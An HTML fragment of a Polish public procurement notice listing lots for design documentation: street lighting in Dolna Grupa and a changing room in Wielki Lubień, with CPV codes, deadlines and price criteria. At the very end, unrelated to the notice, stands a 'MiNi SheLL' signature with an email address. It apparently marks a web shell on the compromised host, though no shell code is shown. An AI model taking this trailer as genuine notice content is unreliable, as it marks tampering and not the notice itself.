<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.22.00.00-6, 71.32.00.00-7, 71.24.80.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 240.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wykonanie dokumentacji projektowej na zadanie pn.:Budowa oświetlenia ulicznego typu parkowego w ul. Wrzosowej w miejscowości Dolna Grupa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowej na budowę oświetlenia ulicznego typu parkowego w ul. Wrzosowej w miejscowości Dolna Grupa o dł. ok. 400m, w ilości ok. 16 lamp. Dokumentacja projektowa musi się składać co najmniej z następujących opracowań:
- projekt budowlany we wszystkich wymaganych branżach  (części: opisowa i graficzna)  w ilości 6 egz. + wersje elektroniczne na nośniku CD zapis w programie PDF,
- projekt wykonawczy we wszystkich wymaganych branżach  (części: opisowa i graficzna)   w ilości 6 egz. + wersje elektroniczne na  nośniku CD zapis w programie PDF,
- przedmiary robót dla wszystkich wymaganych branż w ilości 6  egz. + wersje elektroniczne na nośniku CD zapis w programie PDF,
- kosztorys inwestorski z wyodrębnieniem wszystkich wymaganych branż sporządzony zgodnie z przepisami Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robot budowlanych określonych w programie funkcjonalno - użytkowym /Dz. U. z 2004r. Nr 130, poz. 1389/ w ilości 3 egz.,
- specyfikacje techniczne wykonania i odbioru robót budowlanych dla każdego rodzaju robót budowlanych w ilości 6 egz. + wersje elektroniczne na nośniku CD zapis w programie PDF,
- wytyczne do sporządzenia planu bioz. w ilości 6  egz. + wersja elektroniczne na nośniku CD zapis w programie PDF.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.32.00.00-7, 71.24.80.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 240.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wykonanie dokumentacji projektowej na zadanie pn.:Budowa szatni  przy boisku  w miejscowości Wielki Lubień.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowej na budowę szatni przy boisku w miejscowości Wielki Lubień o pow. zabudowy zespolonej ok. 500m2, w tym: 1/ powierzchnia użytkowa pomieszczeń socjalnych: ok. 100 m2,
2/ powierzchnia użytkowa tarasu zadaszonego ok. 400 m2. Dokumentacja projektowa musi się składać co najmniej z następujących opracowań:
- projekt budowlany we wszystkich wymaganych branżach  (części: opisowa i graficzna)  w ilości 6 egz. + wersje elektroniczne na nośniku CD zapis w programie PDF,
- projekt wykonawczy we wszystkich wymaganych branżach  (części: opisowa i graficzna)   w ilości 6 egz. + wersje elektroniczne na  nośniku CD zapis w programie PDF,
- przedmiarów robót dla wszystkich wymaganych branż w ilości 6  egz. + wersje elektroniczne na nośniku CD zapis w programie PDF,
- kosztorys inwestorski z wyodrębnieniem wszystkich wymaganych branż sporządzony zgodnie z przepisami Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robot budowlanych określonych w programie funkcjonalno - użytkowym /Dz. U. z 2004r. Nr 130, poz. 1389/ w ilości 3 egz.,
- specyfikacje techniczne wykonania i odbioru robót budowlanych dla każdego rodzaju robót budowlanych w ilości 6 egz. + wersje elektroniczne na nośniku CD zapis w programie PDF,
- wytyczne do sporządzenia planu bioz. w ilości 6  egz. + wersja elektroniczne na nośniku CD zapis w programie PDF.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.22.00.00-6, 71.32.00.00-7, 71.24.80.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 210.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com